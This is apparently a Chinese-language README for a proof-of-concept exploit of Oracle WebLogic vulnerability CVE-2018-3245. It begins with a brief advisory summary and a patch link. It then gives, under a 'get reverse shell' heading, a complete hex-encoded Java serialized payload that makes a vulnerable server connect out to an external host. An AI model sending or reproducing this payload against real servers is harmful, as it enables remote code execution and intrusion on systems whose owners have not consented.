Weblogic-CVE-2018-3245

CVE-2018-3245

0x00 简介

当地时间10月16日，北京时间10月17日凌晨，Oracle官方发布了10月份（第三季度）关键补丁更新CPU（Critical Patch Update）,

其中修复了一个7月份（第二季度）CPU补丁中未能完全修复的（CVE-2018-2893）Weblogic远程代码执行漏洞，此次新修复的漏洞编号为CVE-2018-3245。

解决方案

Oracle官方已经在本次的关键补丁更新（CPU）中修复了该漏洞，强烈建议受影响的用户尽快升级更新进行防护。

注：Oracle官方补丁需要用户持有正版软件的许可账号，使用该账号登陆https://support.oracle.com后，可以下载最新补丁。

Oracle官方CPU链接：

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

0x01 获取反弹shell

jas502n-poc.txt 

Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078